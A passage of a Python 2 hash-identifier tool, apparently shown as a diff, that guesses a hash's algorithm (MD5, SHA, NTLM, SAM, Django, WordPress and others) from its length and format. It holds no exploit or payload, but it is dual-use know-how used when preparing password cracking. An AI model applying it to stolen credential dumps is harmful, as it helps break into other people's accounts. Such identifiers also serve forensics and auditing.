"109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible 